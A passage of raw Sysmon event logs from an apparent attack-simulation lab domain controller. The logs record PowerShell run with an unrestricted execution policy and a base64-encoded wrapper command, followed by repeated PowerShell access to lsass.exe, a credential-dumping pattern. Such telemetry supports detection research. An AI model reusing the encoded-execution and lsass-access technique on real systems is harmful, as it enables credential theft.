JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.748{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.748{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.717{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5j0dpr3h.1no.ps12020-11-03 15:52:08.701 10341000x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.701{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.670{D28789B6-7CA8-5FA1-9900-000000008801}50765052C:\Windows\system32\cmd.exe{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.677{D28789B6-7CA8-5FA1-9A00-000000008801}4992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMA